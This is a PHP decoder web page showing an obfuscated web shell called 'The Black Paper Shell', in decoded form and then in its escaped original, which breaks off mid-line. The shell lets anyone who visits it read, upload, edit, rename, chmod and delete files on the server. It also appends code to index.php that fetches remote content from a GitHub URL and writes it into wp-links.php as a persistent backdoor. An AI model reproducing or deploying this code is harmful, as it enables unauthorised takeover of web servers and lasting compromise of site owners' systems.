Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto wYTwR; SUHW6: echo "\74\57\x74\144\x3e\x3c\57\164\x72\76\74\164\x72\x3e\74\164\144..

Decoded Output download

<?   
 goto wYTwR; SUHW6: echo "</td></tr><tr><td>"; goto vOCSG; YQM3R: if (isset($_GET["filesrc"])) { echo "<tr><td>Current File : "; echo $_GET["filesrc"]; echo "</tr></td></table><br />"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</pre>"; } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { echo "</table><br /><center>" . $_POST["path"] . "<br /><br />"; if ($_POST["opt"] == "chmod") { if (isset($_POST["perm"])) { if (chmod($_POST["path"], $_POST["perm"])) { echo "<font color="green">mengganti akses sukses !!</font><br />"; } else { echo "<font color="red">gagal mengganti aksesnya !</font><br />"; } } echo "<form method="POST">\xaPermission : <input name="perm" type="text" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="chmod">\xa<input type="submit" value="Go" />
</form>"; } elseif ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { echo "<font color="green">selamat bang jago,anda berhasil mengganti nama!</font><br />"; } else { echo "<font color="red">yah kita gagal mengganti nama !</font><br />"; } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">
New Name : <input name="newname" type="text" size="20" value="" . $_POST["name"] . "" />
<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="rename">\xa<input type="submit" value="Go" />
</form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<font color="green">Edit File Success!</font><br />"; } else { echo "<font color="red">Failed for Edit File!</font><br />"; } fclose($fp); } echo "<form method="POST">
<textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>"; } echo "</center>"; } else { echo "</table><br /><center>"; if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if (rmdir($_POST["path"])) { echo "<font color="green">Delete Dir Success!</font><br />"; } else { echo "<font color="red">Failed for Delete Dir!</font><br />"; } } elseif ($_POST["type"] == "file") { if (unlink($_POST["path"])) { echo "<font color="green">Delete File Success!</font><br />"; } else { echo "<font color="red">Failed for Edit File!</font><br />"; } } } echo "</center>"; $scandir = scandir($path); echo "<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">\xa<tr class="first">
<td><center>Nama File</center></td>
<td><center>Ukuran file</center></td>
<td><center>Akses</center></td>\xa<td><center>Pilihan</center></td>
</tr>"; foreach ($scandir as $dir) { if (!is_dir("{$path}/{$dir}") || $dir == "." || $dir == "..") { continue; } echo "<tr>\xa<td><a href="?path={$path}/{$dir}">{$dir}</a></td>\xa<td><center><font color=#d3d3d3>--</font></center></td>
<td><center>"; if (is_writable("{$path}/{$dir}")) { echo "<font color="#4D4D4D">"; } elseif (!is_readable("{$path}/{$dir}")) { echo "<font color="red">"; } echo perms("{$path}/{$dir}"); if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) { echo "</font>"; } echo "</center></td>
<td><center><form method="POST" action="?option&path={$path}">\xa
<button name="opt" value="delete">Delete</button>\xa<button name="opt" value="chmod">Chmod</button>
<button name="opt" value="rename">Rename</button>
<button name="opt" value="edit">Edit</button>
\xa<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="{$dir}">\xa<input type="hidden" name="path" value="{$path}/{$dir}">\xa\xa</form></center></td>\xa</tr>"; } echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; foreach ($scandir as $file) { if (!is_file("{$path}/{$file}")) { continue; } $size = filesize("{$path}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>
<td><a href="?filesrc={$path}/{$file}&path={$path}">{$file}</a></td>
<td><center>" . $size . "</center></td>
<td><center>"; if (is_writable("{$path}/{$file}")) { echo "<font color="#4D4D4D">"; } elseif (!is_readable("{$path}/{$file}")) { echo "<font color="red">"; } echo perms("{$path}/{$file}"); if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) { echo "</font>"; } echo "</center></td>\xa<td><center><form method="POST" action="?option&path={$path}">

\xa<button name="opt" value="delete">Delete</button>\xa<button name="opt" value="chmod">Chmod</button>
<button name="opt" value="rename">Rename</button>\xa<button name="opt" value="edit">Edit</button>

<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="{$file}">
<input type="hidden" name="path" value="{$path}/{$file}">\xa\xa</form></center></td>\xa</tr>"; } echo "</table>\xa</div>"; } goto zE7yc; qvYmK: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto Uvl3K; wYTwR: ?> 
 
 
<?php  goto rIDaz; vOCSG: if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { echo "<font color="green">selamat anda berasil mengupload file !</font><br />"; } else { echo "<font color="red">maaf bang,gagal mengupload file!</font><br />"; } } goto WTpIf; S5XcK: $data = "?><?  \xa file_put_contents("wp-links.php", file_get_contents("https://raw.githubusercontent.com/7870a/ctf/master/tes.txt"));  ?>"; goto vXNjs; rIDaz: $file = "index.php"; goto S5XcK; vXNjs: $a = file_get_contents("index.php"); goto QHmQK; QHmQK: if (strstr($a, "https://raw.githubusercontent.com/7870a/ctf/master/tes.txt")) { } else { file_put_contents("{$file}", "{$a} {$data}"); } goto YVkor; TBkUX: if (isset($_GET["path"])) { $path = $_GET["path"]; } else { $path = getcwd(); } goto lVuNa; hwW0O: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<a href="?path=/">/</a>"; continue; } if ($pat == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $pat . "</a>/"; } goto SUHW6; YVkor: echo "<!DOCTYPE HTML>\xa<HTML>
<HEAD>\xa<link href="" rel="stylesheet" type="text/css">\xa<title>The Black Paper</title><link rel="SHORTCUT ICON"  href="https://theblackpaper.org/TBP.jpg">\xa<style>
body{\xafont-family: "Courier", cursive;
color: #fff;\xabackground-color: #000;\xatext-shadow:0px 0px 1px #757575;\xa}
#content tr:hover{\xabackground-color: #000;
text-shadow:0px 0px 10px #fff;\xa}
#content .first{
background-color: #4D4D4D;
}
#content .first:hover{
background-color: #4D4D4D;
text-shadow:0px 0px 1px #757575;\xa}
H1{
font-family: "Courier", cursive;\xacolor: #fff;
}\xaa{\xacolor: #fff;
text-decoration: none;
}\xaa:hover{\xacolor: #fff;
text-shadow:0px 0px 5px #ffffff;
}
input,select,textarea{\xaborder: 1px #fff solid;\xa-moz-border-radius: 5px;\xa-webkit-border-radius:5px;
border-radius:5px;
}\xafoot {
	\x9background-color: black;\xa  color: white;
\x9}
</style>\xa</HEAD>\xa<BODY bgcolor="white"><center>\xa<img src="https://1.bp.blogspot.com/-eyN8qlix3HM/X1N3jkh3RJI/AAAAAAAAAYE/04Okt18xX0MVZNoPUjQvLAbe0oNHiHzHACLcBGAsYHQ/s320/86591478-21a3-47f0-9ad0-1342297e9e6e.jpg"></center>\xa<H1 class="foot"><center>The Black Paper</center></H1><hr><marquee class="foot">The Black Paper Shell</marquee><hr>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Current Path : "; goto TBkUX; gKeWG: $paths = explode("/", $path); goto hwW0O; WTpIf: echo "<form enctype="multipart/form-data" method="POST">\xaMasukan File : <input type="file" name="file" />\xa<input type="submit" value="upload" />
</form>\xa</td></tr>"; goto YQM3R; zE7yc: echo "
</BODY>\xa</HTML>"; goto qvYmK; lVuNa: $path = str_replace("\", "/", $path); goto gKeWG; Uvl3K:  ?>

Did this file decode correctly?

Original Code


 goto wYTwR; SUHW6: echo "\74\57\x74\144\x3e\x3c\57\164\x72\76\74\164\x72\x3e\74\164\144\76"; goto vOCSG; YQM3R: if (isset($_GET["\x66\x69\154\x65\163\162\x63"])) { echo "\x3c\164\x72\76\74\164\x64\76\103\165\162\x72\145\156\164\40\106\x69\x6c\145\x20\72\40"; echo $_GET["\x66\151\154\x65\163\162\x63"]; echo "\74\57\164\x72\76\74\x2f\164\144\76\74\57\164\x61\142\x6c\x65\x3e\74\142\x72\40\x2f\76"; echo "\x3c\160\162\145\x3e" . htmlspecialchars(file_get_contents($_GET["\146\151\x6c\x65\163\162\x63"])) . "\74\57\x70\x72\x65\76"; } elseif (isset($_GET["\157\160\x74\151\x6f\x6e"]) && $_POST["\x6f\x70\x74"] != "\x64\x65\x6c\x65\164\145") { echo "\x3c\x2f\x74\141\142\154\145\x3e\x3c\142\162\x20\x2f\76\x3c\143\x65\156\164\x65\x72\x3e" . $_POST["\x70\x61\x74\x68"] . "\74\x62\162\40\57\x3e\x3c\142\162\40\x2f\76"; if ($_POST["\x6f\x70\x74"] == "\x63\150\155\157\x64") { if (isset($_POST["\x70\145\x72\x6d"])) { if (chmod($_POST["\x70\141\x74\150"], $_POST["\x70\x65\162\x6d"])) { echo "\x3c\x66\x6f\156\x74\x20\143\x6f\x6c\x6f\x72\x3d\x22\x67\x72\145\x65\156\x22\x3e\155\x65\x6e\147\x67\x61\156\x74\x69\x20\x61\x6b\163\145\x73\40\x73\x75\x6b\163\145\x73\x20\x21\41\x3c\x2f\x66\157\x6e\164\76\74\x62\162\40\x2f\76"; } else { echo "\74\146\x6f\156\x74\40\x63\157\154\x6f\162\75\42\x72\x65\x64\42\x3e\147\141\147\141\154\x20\x6d\x65\x6e\147\147\x61\x6e\x74\x69\x20\141\153\x73\145\x73\156\171\x61\40\41\x3c\x2f\x66\x6f\156\x74\76\74\x62\x72\x20\57\76"; } } echo "\74\146\x6f\162\x6d\40\x6d\x65\164\150\157\x64\x3d\42\x50\117\123\x54\x22\x3e\xa\120\x65\x72\x6d\x69\163\163\x69\x6f\156\40\x3a\x20\x3c\151\x6e\x70\x75\164\40\156\x61\155\145\x3d\x22\160\145\x72\155\42\x20\x74\171\160\x65\75\x22\x74\x65\170\x74\x22\x20\x73\x69\172\145\75\42\x34\x22\x20\x76\x61\x6c\165\x65\75\x22" . substr(sprintf("\x25\157", fileperms($_POST["\160\x61\164\150"])), -4) . "\x22\40\57\76\xa\x3c\x69\x6e\x70\165\x74\x20\164\171\x70\x65\x3d\42\150\x69\x64\144\145\156\42\x20\156\141\155\145\x3d\x22\x70\x61\164\150\x22\40\x76\141\x6c\x75\x65\75\x22" . $_POST["\160\141\x74\x68"] . "\42\76\xa\74\x69\156\x70\x75\x74\x20\x74\x79\160\145\75\x22\x68\x69\x64\x64\145\156\x22\x20\x6e\141\x6d\145\75\42\x6f\x70\x74\42\40\x76\141\154\165\x65\75\42\143\x68\155\x6f\x64\x22\76\xa\x3c\x69\x6e\x70\x75\x74\x20\x74\171\x70\x65\x3d\42\x73\x75\x62\155\151\164\x22\x20\166\141\154\165\x65\75\42\x47\157\42\x20\x2f\76\12\74\57\146\x6f\x72\x6d\76"; } elseif ($_POST["\157\160\164"] == "\162\145\156\x61\x6d\x65") { if (isset($_POST["\156\145\167\x6e\x61\155\145"])) { if (rename($_POST["\x70\x61\x74\150"], $path . "\57" . $_POST["\x6e\145\x77\x6e\x61\155\145"])) { echo "\x3c\146\157\156\164\x20\143\x6f\x6c\157\162\75\x22\147\x72\x65\145\156\42\x3e\163\x65\x6c\x61\155\141\164\40\x62\x61\x6e\x67\40\152\141\x67\157\54\141\156\144\x61\x20\142\145\x72\x68\x61\163\151\154\x20\x6d\x65\156\147\x67\141\156\164\151\x20\156\x61\x6d\141\x21\x3c\57\x66\157\x6e\164\76\x3c\142\x72\x20\x2f\76"; } else { echo "\x3c\146\157\x6e\x74\40\x63\157\x6c\157\x72\75\42\162\145\144\42\76\x79\141\150\40\x6b\x69\164\x61\40\x67\141\147\141\154\x20\x6d\x65\x6e\147\x67\141\156\x74\x69\40\x6e\141\x6d\141\x20\x21\74\57\x66\157\156\x74\x3e\74\142\x72\x20\57\76"; } $_POST["\x6e\141\x6d\x65"] = $_POST["\x6e\145\167\x6e\141\x6d\145"]; } echo "\x3c\146\157\162\155\x20\155\x65\164\150\x6f\x64\75\42\120\117\x53\124\x22\76\12\116\145\167\40\x4e\141\x6d\x65\x20\x3a\40\74\x69\x6e\x70\165\x74\40\156\141\x6d\145\x3d\x22\x6e\145\x77\156\x61\155\145\42\x20\x74\171\x70\x65\75\x22\164\x65\170\164\42\40\163\x69\x7a\145\75\42\x32\x30\x22\40\166\141\x6c\165\145\75\42" . $_POST["\x6e\141\155\x65"] . "\42\40\57\x3e\12\74\151\156\160\x75\x74\40\164\x79\x70\x65\x3d\x22\x68\x69\144\x64\145\156\42\x20\x6e\x61\155\x65\x3d\42\160\141\x74\x68\42\40\x76\141\154\x75\x65\75\x22" . $_POST["\160\141\164\x68"] . "\42\76\xa\x3c\151\156\160\165\x74\x20\164\x79\x70\x65\x3d\x22\x68\151\x64\144\145\x6e\x22\40\x6e\141\155\145\75\x22\157\160\x74\x22\40\166\141\154\165\145\x3d\42\x72\145\x6e\141\155\x65\x22\x3e\xa\x3c\151\156\x70\x75\164\40\164\171\x70\145\75\42\163\x75\142\x6d\151\x74\x22\40\x76\141\x6c\165\145\x3d\42\x47\157\42\40\x2f\x3e\12\x3c\x2f\146\157\162\x6d\x3e"; } elseif ($_POST["\x6f\x70\164"] == "\145\x64\x69\x74") { if (isset($_POST["\163\x72\143"])) { $fp = fopen($_POST["\x70\141\x74\x68"], "\167"); if (fwrite($fp, $_POST["\163\162\143"])) { echo "\x3c\146\157\x6e\164\x20\143\157\x6c\157\162\x3d\42\x67\x72\x65\145\x6e\x22\x3e\x45\x64\151\164\40\x46\151\x6c\145\40\x53\x75\143\x63\x65\163\x73\x21\74\x2f\x66\x6f\156\164\76\74\x62\x72\x20\57\x3e"; } else { echo "\x3c\146\157\156\164\x20\x63\x6f\x6c\157\162\75\42\x72\x65\x64\42\x3e\x46\141\151\154\145\144\x20\x66\x6f\x72\x20\x45\144\151\164\40\x46\x69\x6c\145\x21\x3c\x2f\x66\x6f\x6e\x74\x3e\74\142\162\40\57\76"; } fclose($fp); } echo "\74\146\157\162\155\40\x6d\x65\164\150\157\144\x3d\42\x50\117\123\x54\x22\x3e\12\74\164\145\170\x74\141\162\145\141\x20\143\157\154\163\x3d\x38\x30\x20\x72\157\167\x73\75\x32\x30\40\156\x61\x6d\x65\x3d\x22\x73\162\x63\x22\76" . htmlspecialchars(file_get_contents($_POST["\160\141\164\x68"])) . "\74\57\x74\x65\170\x74\141\162\145\141\76\x3c\142\x72\x20\x2f\76\xa\74\x69\156\x70\x75\x74\40\164\x79\160\145\x3d\42\150\x69\144\x64\145\156\x22\x20\156\x61\155\x65\75\42\x70\141\x74\150\42\x20\166\141\154\165\x65\75\42" . $_POST["\x70\141\x74\x68"] . "\42\x3e\xa\x3c\x69\x6e\x70\x75\x74\x20\164\171\160\x65\x3d\x22\150\151\144\x64\x65\156\42\x20\x6e\x61\155\x65\x3d\42\157\160\164\x22\x20\166\x61\x6c\x75\x65\x3d\x22\145\144\151\164\42\x3e\12\74\151\156\160\165\x74\40\164\x79\160\145\x3d\42\163\165\x62\155\x69\164\42\40\166\x61\x6c\x75\x65\x3d\42\x47\x6f\42\40\57\76\12\x3c\57\x66\x6f\162\x6d\76"; } echo "\x3c\57\143\x65\x6e\x74\x65\x72\76"; } else { echo "\74\x2f\164\x61\x62\154\x65\x3e\x3c\142\x72\x20\57\x3e\x3c\x63\145\x6e\x74\x65\162\x3e"; if (isset($_GET["\x6f\x70\x74\151\157\x6e"]) && $_POST["\157\160\x74"] == "\x64\x65\154\x65\x74\x65") { if ($_POST["\164\171\x70\145"] == "\144\151\x72") { if (rmdir($_POST["\160\x61\x74\150"])) { echo "\74\x66\x6f\156\x74\x20\143\x6f\154\157\162\75\x22\147\162\x65\x65\x6e\42\x3e\104\x65\154\x65\x74\145\x20\x44\151\162\x20\123\x75\143\x63\x65\x73\163\x21\74\x2f\146\157\156\164\76\74\x62\x72\40\x2f\76"; } else { echo "\74\x66\x6f\x6e\x74\x20\x63\157\x6c\157\162\75\42\162\x65\144\42\76\x46\141\x69\154\x65\x64\x20\146\157\162\40\104\x65\154\145\x74\x65\x20\104\151\162\41\x3c\57\x66\x6f\156\x74\76\x3c\142\x72\40\57\76"; } } elseif ($_POST["\164\171\160\x65"] == "\146\x69\x6c\145") { if (unlink($_POST["\160\x61\164\150"])) { echo "\74\146\x6f\156\164\x20\x63\x6f\154\x6f\162\x3d\42\147\x72\145\145\x6e\x22\76\x44\x65\x6c\x65\x74\145\40\x46\x69\154\145\x20\123\165\x63\x63\x65\163\x73\41\x3c\x2f\x66\x6f\x6e\164\76\x3c\142\162\40\x2f\x3e"; } else { echo "\74\x66\x6f\x6e\164\40\x63\157\154\157\162\75\x22\162\145\x64\x22\76\x46\x61\151\154\145\144\40\146\157\162\x20\105\x64\x69\x74\40\106\151\154\x65\41\74\x2f\146\x6f\x6e\x74\76\74\x62\x72\40\57\x3e"; } } } echo "\74\x2f\143\x65\156\164\x65\162\76"; $scandir = scandir($path); echo "\74\x64\x69\x76\40\151\x64\75\42\x63\157\x6e\x74\x65\156\x74\x22\76\74\x74\141\x62\x6c\x65\x20\167\151\x64\x74\150\75\x22\x31\x30\x30\x25\42\40\x62\x6f\x72\x64\145\x72\x3d\42\60\x22\x20\x63\145\x6c\x6c\160\x61\x64\x64\x69\x6e\x67\75\42\63\42\x20\143\145\154\x6c\163\160\x61\x63\151\156\147\75\x22\x31\42\x20\141\x6c\151\x67\156\75\42\143\145\156\x74\x65\x72\x22\76\xa\74\x74\162\x20\x63\154\x61\163\163\75\42\146\x69\162\x73\x74\42\76\12\74\164\144\x3e\74\x63\145\156\x74\x65\x72\76\116\141\155\141\40\106\151\154\145\x3c\57\143\x65\156\x74\145\162\x3e\74\57\x74\x64\x3e\12\74\164\144\76\x3c\143\145\x6e\164\145\x72\76\x55\x6b\x75\x72\x61\x6e\40\x66\151\x6c\145\x3c\x2f\143\x65\x6e\x74\145\162\76\74\x2f\x74\x64\76\12\x3c\164\144\76\x3c\x63\145\156\164\x65\x72\x3e\x41\x6b\163\145\x73\x3c\57\x63\145\x6e\x74\145\162\76\74\57\x74\144\76\xa\x3c\164\144\76\74\143\145\x6e\x74\x65\x72\76\120\x69\x6c\x69\150\141\x6e\x3c\x2f\x63\x65\156\x74\x65\x72\76\74\x2f\x74\x64\76\12\x3c\x2f\x74\162\76"; foreach ($scandir as $dir) { if (!is_dir("{$path}\57{$dir}") || $dir == "\56" || $dir == "\x2e\56") { continue; } echo "\74\164\162\76\xa\x3c\x74\x64\x3e\74\141\40\x68\162\145\146\x3d\x22\x3f\160\141\x74\x68\x3d{$path}\x2f{$dir}\42\76{$dir}\74\x2f\x61\x3e\74\57\x74\x64\76\xa\x3c\x74\x64\76\x3c\143\x65\x6e\x74\145\x72\x3e\x3c\146\x6f\156\x74\x20\x63\157\154\157\x72\75\x23\x64\x33\x64\x33\144\x33\76\x2d\55\74\57\x66\157\156\164\x3e\x3c\57\143\145\x6e\164\145\162\x3e\x3c\x2f\164\x64\76\12\x3c\x74\144\x3e\x3c\143\145\156\164\145\162\x3e"; if (is_writable("{$path}\57{$dir}")) { echo "\x3c\146\157\x6e\x74\x20\143\157\154\x6f\x72\x3d\x22\43\64\x44\x34\x44\x34\104\42\x3e"; } elseif (!is_readable("{$path}\x2f{$dir}")) { echo "\74\x66\157\x6e\164\40\x63\157\154\157\x72\75\x22\162\x65\144\x22\x3e"; } echo perms("{$path}\x2f{$dir}"); if (is_writable("{$path}\x2f{$dir}") || !is_readable("{$path}\57{$dir}")) { echo "\74\x2f\146\157\156\x74\x3e"; } echo "\74\57\x63\145\x6e\x74\145\162\x3e\74\57\164\x64\x3e\12\74\x74\x64\x3e\x3c\143\x65\x6e\164\145\x72\76\x3c\146\x6f\162\155\40\155\x65\x74\150\157\144\75\42\120\x4f\123\124\42\x20\141\x63\164\x69\157\x6e\x3d\42\77\157\x70\x74\151\x6f\156\46\160\141\164\150\75{$path}\42\76\xa\12\x3c\x62\x75\164\164\x6f\x6e\x20\x6e\141\x6d\x65\75\42\157\160\x74\42\x20\166\x61\154\165\x65\75\x22\144\145\154\145\164\x65\42\x3e\x44\145\154\x65\x74\145\x3c\57\142\165\x74\164\x6f\x6e\x3e\xa\74\x62\x75\x74\164\157\156\40\156\x61\x6d\145\75\x22\x6f\x70\164\x22\40\x76\x61\x6c\x75\145\75\42\x63\x68\155\157\x64\x22\76\103\150\x6d\x6f\144\74\57\142\x75\164\x74\x6f\156\76\12\74\x62\x75\164\164\x6f\156\x20\x6e\x61\155\x65\x3d\x22\157\160\164\x22\40\166\141\154\x75\x65\x3d\x22\x72\x65\156\x61\x6d\x65\42\76\x52\145\156\141\x6d\145\x3c\57\x62\165\x74\164\157\156\x3e\12\x3c\x62\x75\x74\x74\157\156\40\x6e\x61\x6d\145\x3d\x22\157\160\x74\42\x20\166\141\154\x75\145\75\42\145\144\151\164\42\76\105\x64\151\164\74\x2f\142\x75\164\164\157\156\x3e\12\xa\74\x69\x6e\160\165\164\x20\x74\171\160\x65\x3d\x22\150\x69\x64\144\145\156\42\x20\156\x61\x6d\145\x3d\42\164\171\160\x65\42\x20\166\x61\154\165\145\75\x22\144\151\x72\42\x3e\12\x3c\x69\156\x70\165\x74\40\164\171\160\145\x3d\42\150\x69\x64\x64\145\156\x22\x20\x6e\141\155\145\x3d\42\156\141\x6d\145\42\40\x76\x61\154\x75\x65\x3d\42{$dir}\x22\76\xa\74\151\x6e\x70\x75\x74\40\x74\x79\x70\145\75\x22\150\151\144\x64\145\x6e\42\x20\156\x61\155\x65\75\42\160\x61\164\150\x22\40\166\x61\x6c\x75\x65\75\42{$path}\57{$dir}\x22\x3e\xa\xa\74\x2f\146\x6f\162\155\76\74\x2f\143\145\156\x74\145\x72\76\x3c\57\x74\144\76\xa\x3c\57\x74\162\76"; } echo "\74\164\162\40\143\154\141\163\163\75\42\x66\x69\162\163\164\42\76\x3c\x74\144\76\74\57\x74\x64\76\x3c\164\144\76\74\57\164\144\x3e\74\164\144\x3e\x3c\x2f\164\144\76\74\164\x64\76\74\x2f\164\144\76\74\57\164\x72\76"; foreach ($scandir as $file) { if (!is_file("{$path}\x2f{$file}")) { continue; } $size = filesize("{$path}\x2f{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\115\x42"; } else { $size = $size . "\x20\x4b\102"; } echo "\x3c\x74\162\x3e\12\x3c\164\144\76\x3c\141\x20\x68\x72\145\146\75\x22\x3f\x66\151\154\x65\x73\162\x63\x3d{$path}\x2f{$file}\46\160\x61\164\x68\x3d{$path}\x22\76{$file}\74\57\141\x3e\x3c\x2f\x74\144\x3e\12\74\x74\x64\76\74\143\145\x6e\x74\145\x72\76" . $size . "\x3c\x2f\143\145\x6e\164\x65\162\76\74\x2f\x74\144\x3e\12\74\164\144\x3e\74\x63\145\156\x74\145\162\76"; if (is_writable("{$path}\x2f{$file}")) { echo "\x3c\x66\x6f\156\164\x20\143\x6f\154\157\162\75\x22\43\64\x44\64\x44\x34\104\x22\x3e"; } elseif (!is_readable("{$path}\x2f{$file}")) { echo "\x3c\146\x6f\156\x74\x20\143\x6f\154\157\162\75\x22\162\145\144\42\76"; } echo perms("{$path}\57{$file}"); if (is_writable("{$path}\x2f{$file}") || !is_readable("{$path}\x2f{$file}")) { echo "\x3c\x2f\x66\x6f\x6e\x74\x3e"; } echo "\74\57\143\145\x6e\164\145\162\76\74\x2f\164\144\x3e\xa\74\164\x64\x3e\74\x63\145\x6e\164\x65\162\76\74\146\x6f\x72\x6d\40\155\145\x74\150\x6f\144\x3d\42\120\117\x53\124\42\x20\x61\x63\x74\x69\x6f\x6e\75\42\x3f\157\x70\x74\x69\x6f\156\x26\x70\141\x74\x68\75{$path}\42\x3e\12\12\xa\74\x62\x75\164\164\x6f\156\x20\x6e\x61\x6d\x65\75\42\x6f\x70\164\42\x20\x76\x61\154\165\x65\75\42\x64\x65\x6c\145\164\x65\x22\x3e\x44\x65\x6c\x65\x74\x65\74\57\x62\x75\164\x74\x6f\156\76\xa\74\x62\165\164\164\x6f\x6e\40\156\141\155\145\x3d\x22\157\x70\164\x22\x20\166\x61\154\165\145\x3d\x22\x63\150\155\x6f\x64\42\x3e\103\x68\x6d\157\x64\74\x2f\x62\x75\164\164\157\x6e\76\12\74\142\x75\x74\x74\157\156\40\x6e\141\x6d\x65\75\42\x6f\x70\x74\x22\x20\166\141\x6c\165\145\x3d\42\x72\145\x6e\x61\x6d\145\x22\76\x52\145\x6e\141\155\145\74\57\142\165\164\164\x6f\x6e\x3e\xa\74\x62\165\164\x74\157\156\x20\x6e\141\x6d\x65\x3d\42\x6f\160\164\x22\x20\166\x61\154\165\x65\75\x22\145\144\x69\164\42\76\105\x64\x69\x74\74\57\142\165\x74\164\x6f\156\x3e\12\12\74\151\156\x70\x75\164\x20\164\171\160\x65\x3d\42\150\x69\x64\144\x65\x6e\x22\40\x6e\141\x6d\145\x3d\42\x74\x79\160\x65\x22\40\166\x61\154\165\145\x3d\x22\146\151\x6c\x65\x22\76\xa\74\x69\156\x70\165\164\x20\x74\x79\160\x65\x3d\x22\150\151\x64\144\145\x6e\42\x20\x6e\141\x6d\x65\x3d\42\156\x61\155\145\42\40\x76\x61\154\165\x65\x3d\42{$file}\x22\x3e\12\74\151\x6e\x70\x75\164\40\164\x79\x70\145\x3d\42\x68\x69\144\144\145\x6e\42\40\156\141\x6d\145\75\x22\160\141\x74\x68\42\x20\166\x61\x6c\x75\x65\x3d\x22{$path}\57{$file}\42\x3e\xa\xa\74\57\146\x6f\162\x6d\x3e\74\x2f\x63\x65\x6e\164\x65\x72\x3e\x3c\x2f\x74\144\x3e\xa\x3c\x2f\164\x72\x3e"; } echo "\74\57\164\141\142\x6c\145\76\xa\74\x2f\x64\x69\x76\x3e"; } goto zE7yc; qvYmK: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "\163"; } elseif (($perms & 40960) == 40960) { $info = "\x6c"; } elseif (($perms & 32768) == 32768) { $info = "\55"; } elseif (($perms & 24576) == 24576) { $info = "\142"; } elseif (($perms & 16384) == 16384) { $info = "\x64"; } elseif (($perms & 8192) == 8192) { $info = "\x63"; } elseif (($perms & 4096) == 4096) { $info = "\160"; } else { $info = "\165"; } $info .= $perms & 256 ? "\x72" : "\x2d"; $info .= $perms & 128 ? "\x77" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\x78" : ($perms & 2048 ? "\x53" : "\55"); $info .= $perms & 32 ? "\x72" : "\x2d"; $info .= $perms & 16 ? "\x77" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\170" : ($perms & 1024 ? "\x53" : "\55"); $info .= $perms & 4 ? "\x72" : "\x2d"; $info .= $perms & 2 ? "\167" : "\x2d"; $info .= $perms & 1 ? $perms & 512 ? "\x74" : "\170" : ($perms & 512 ? "\x54" : "\x2d"); return $info; } goto Uvl3K; wYTwR: ?>


<?php  goto rIDaz; vOCSG: if (isset($_FILES["\146\151\x6c\145"])) { if (copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\145"], $path . "\57" . $_FILES["\x66\151\x6c\x65"]["\156\141\x6d\145"])) { echo "\x3c\146\157\x6e\164\40\143\157\x6c\157\x72\x3d\x22\x67\x72\145\x65\x6e\42\76\x73\x65\154\141\x6d\141\164\40\x61\156\144\141\40\142\145\162\141\163\151\154\40\155\145\x6e\x67\165\160\x6c\x6f\x61\x64\40\x66\x69\154\x65\x20\x21\x3c\57\146\157\x6e\x74\x3e\x3c\142\162\x20\57\x3e"; } else { echo "\x3c\146\157\156\x74\x20\143\157\154\157\162\x3d\x22\162\145\x64\42\76\155\x61\x61\x66\40\x62\141\x6e\147\x2c\x67\141\x67\141\x6c\x20\x6d\145\156\x67\165\x70\x6c\x6f\x61\x64\x20\146\151\154\145\x21\74\x2f\x66\x6f\156\x74\76\x3c\142\x72\40\x2f\76"; } } goto WTpIf; S5XcK: $data = 